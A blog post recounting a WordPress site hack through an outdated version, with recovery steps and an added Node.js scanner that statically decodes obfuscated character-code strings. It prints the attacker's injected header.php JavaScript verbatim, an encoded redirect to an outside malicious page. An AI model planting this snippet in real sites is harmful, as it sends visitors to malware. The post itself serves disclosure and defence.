Hacked – Update your Old Software

A few days ago my website OneDittyADay.com was hacked. I’m not 100% sure what went down, but from what I gather, about a week ago he exploited a bug using a script probably similar to this one exploiting WordPress 2.1.2. This bug allows access to the MD5 hashes of every user. A few days later, after cracking WordPress’ default random password of six lowercase letters and digits, he made a very simple edit via the theme editor to header.php.

In it he included this snippet of code:

<SCRIPT LANGUAGE="JavaScript">

<!--

function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!32!119!105!110!100!111!119!46!108!111!99!97!116!105!111!110!61!34!104!116!116!112!58!47!47!120!114!108!46!117!115!47!107!107!51!119!54!34!32!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}

//-->

</SCRIPT><SCRIPT LANGUAGE="JavaScript">

<!--

Decode();

//-->

</SCRIPT>

I haven’t decrypted it to display its contents, but I know it’s just a simple JavaScript redirect to a rather nasty Windows “anti-virus” site. I put that in quotes because it is anything but. This webpage even caught Firefox in Ubuntu for a loop and took a bit to shut down.
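A snippet like this can be decoded statically, without letting `document.write` run. The following Node.js code is an added example, not part of the original post: it finds quoted runs of delimiter-separated character codes in a file's contents and reports what they decode to. The names `scanSource`, `decodeRun` and `SAMPLE_HEADER` are hypothetical, and the sample input is constructed with a reserved `.invalid` host.

```javascript
// Added example: statically decode "code!code!..." strings; nothing is executed.
// A quoted run of 8+ decimal character codes, each followed by the same
// one-character delimiter (the snippet in the post uses '!').
const CHARCODE_RUN = /["'](\d{1,3}([^\d"'\s])(?:\d{1,3}\2){7,}\d{0,3})["']/g;

// Split on the delimiter, drop the empty tail, map each code to its character.
function decodeRun(run, delim) {
  return run.split(delim).filter(Boolean)
    .map((n) => String.fromCharCode(Number(n))).join('');
}

// Scan file contents (for example a theme's header.php) and report decoded runs.
function scanSource(source) {
  const findings = [];
  for (const m of source.matchAll(CHARCODE_RUN)) {
    const decoded = decodeRun(m[1], m[2]);
    // Keep only runs that decode to printable ASCII; others are probably data.
    if (!/^[\x20-\x7e\r\n\t]+$/.test(decoded)) continue;
    findings.push({
      offset: m.index,
      decoded,
      urls: decoded.match(/https?:\/\/[^\s"'<>]+/g) || [],
      redirects: /\blocation(?:\.href)?\s*=/.test(decoded),
      usesSink: /document\.write|eval\s*\(/.test(source),
    });
  }
  return findings;
}

// Constructed sample, not the payload from the post: a header.php fragment
// whose encoded string redirects to a reserved .invalid host.
const encode = (s) => [...s].map((ch) => ch.charCodeAt(0) + '!').join('');
const SAMPLE_HEADER = '<?php wp_head(); ?>\n<script>function Decode(){var str="' +
  encode('<script> window.location="http://example.invalid/landing" </script>') +
  '";/* decoder loop */document.write(out);}</script>';

console.log(scanSource(SAMPLE_HEADER));
```

Running the same scan over every file under a theme directory flags edits like the one made to header.php, since legitimate templates rarely contain long quoted runs of character codes next to `document.write`.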

As soon as I found out all of this, I reset the password and then upgraded WordPress to the very latest version. One thing went wrong with the upgrade: the categories for some reason didn’t copy over correctly. Since I only have a handful of categories, I manually updated them, but it did take me a few to figure out why my website didn’t print any articles.

It’s kind of embarrassing, but I thought I’d share. Moral of the story: even on your dead sites, upgrade or go static.
